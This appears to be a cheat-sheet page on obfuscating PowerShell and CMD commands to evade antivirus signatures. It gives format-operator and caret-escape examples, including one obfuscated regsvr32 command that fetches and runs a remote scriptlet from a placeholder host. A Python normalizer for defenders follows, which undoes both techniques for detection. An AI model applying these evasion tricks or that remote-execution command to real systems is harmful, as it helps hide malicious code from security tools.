Command Obfuscation
PowerShell
Obfuscate simple PowerShell scripts using the following string token manipulation technique:
Write-Host "Who am I?"
Write-Host ("{2}{0}{1}"-f'o am',' I?','Wh')
This also works on simple commands using the call operator (&):
whoami
&("{0}{1}{2}"-f'who','am','i')
Or even on more complex cmdlets requiring arguments using IEX:
IEX "Write-Host Who am I?"
IEX (("{2}{1}{0}"-f'ost','te-H','Wri') + " " + ("{2}{0}{1}"-f'o am',' I?','Wh'))
CMD
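Use the ^ character everywhere in a malicious CMD command to evade AV signatures. cmd.exe treats ^ as an escape character and removes it before the command runs, so the command still executes while no longer matching a literal string signature.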
Example:
r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://evil.site/policy.sct s^C^r^O^b^j.D^l^L
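A defender-side normalizer for the PowerShell and CMD techniques above, as an added example that is not part of the original page: it strips cmd.exe caret escapes and resolves literal -f format expressions, so detections can match the command that actually runs and can alert on the obfuscation itself. The function names and marker labels are assumptions, and the caret handling is simplified to the rule that ^ escapes the next character outside double quotes.

```python
import re

# One quoted literal argument, and a -f expression built only from literals,
# with optional balanced parentheses: ("{2}{0}{1}"-f'o am',' I?','Wh')
ARG = r"""(?:'[^']*'|"[^"]*")"""
FORMAT_EXPR = re.compile(
    r"""(\(\s*)?(["'])((?:[^"'{}]|\{\d+\})*)\2\s*-f\s*("""
    + ARG + r"(?:\s*,\s*" + ARG + r")*)(?(1)\s*\))",
    re.IGNORECASE,
)

def strip_carets(text):
    """Drop cmd.exe ^ escapes outside double quotes (simplified model)."""
    out, in_quotes, i = [], False, 0
    while i < len(text):
        ch = text[i]
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "^" and not in_quotes and i + 1 < len(text):
            i += 1  # skip the caret, keep the character it escapes
            ch = text[i]
        out.append(ch)
        i += 1
    return "".join(out)

def resolve_format(text):
    """Replace literal -f expressions with the string they evaluate to."""
    def build(m):
        args = [a[1:-1] for a in re.findall(ARG, m.group(4))]
        try:
            return re.sub(r"\{(\d+)\}", lambda p: args[int(p.group(1))], m.group(3))
        except IndexError:
            return m.group(0)  # placeholder without an argument: leave as is
    return FORMAT_EXPR.sub(build, text)

def normalize(cmdline):
    """Return (lowercased normalized text, obfuscation markers seen)."""
    markers = set()
    no_carets = strip_carets(cmdline)
    if no_carets != cmdline:
        markers.add("caret-escape")
    resolved = resolve_format(no_carets)
    if resolved != no_carets:
        markers.add("format-operator")
    return resolved.lower(), markers

if __name__ == "__main__":
    # Sample input: the obfuscated CMD line shown on this page.
    line = "r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://evil.site/policy.sct s^C^r^O^b^j.D^l^L"
    print(normalize(line))
```

Run signatures against the normalized text, and treat a non-empty marker set on a process command line as a signal in its own right.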